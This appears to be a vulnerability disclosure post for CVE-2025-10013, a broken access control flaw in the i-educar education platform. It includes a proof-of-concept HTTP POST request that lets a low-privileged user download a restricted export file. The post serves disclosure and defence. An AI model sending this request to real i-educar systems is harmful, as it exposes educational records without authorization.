Featured image of post CVE-2025-10013

CVE-2025-10013

Broken Access Control

CVE-2025-10013: Broken Access Control in /exportacao-para-o-seb Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10013

Summary

A Broken Access Control vulnerability was identified in the /exportacao-para-o-seb endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.

Details

Vulnerable Endpoint: POST /exportacao-para-o-seb
Authentication: Required

The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .

PoC

  • Authenticate as a non-privileged user.

  • Send the following request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
POST /exportacao-para-o-seb HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/exportacao-para-o-seb
Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

ano=2025&ref_cod_instituicao=1&ref_cod_escola=4

  • We could observe that a file is attached to the response. This user shouldn't do this request.

Impact

Broken Access Control vulnerabilities can have severe consequences, including:

  • Unauthorized access to restricted functionality;
  • Escalation of privileges for low-level users;
  • Exposure of sensitive data and potential system compromise;
  • Loss of confidentiality and integrity of educational records;
  • Reputational damage to the organization.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md

Finder

Marcelo Queiroz

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy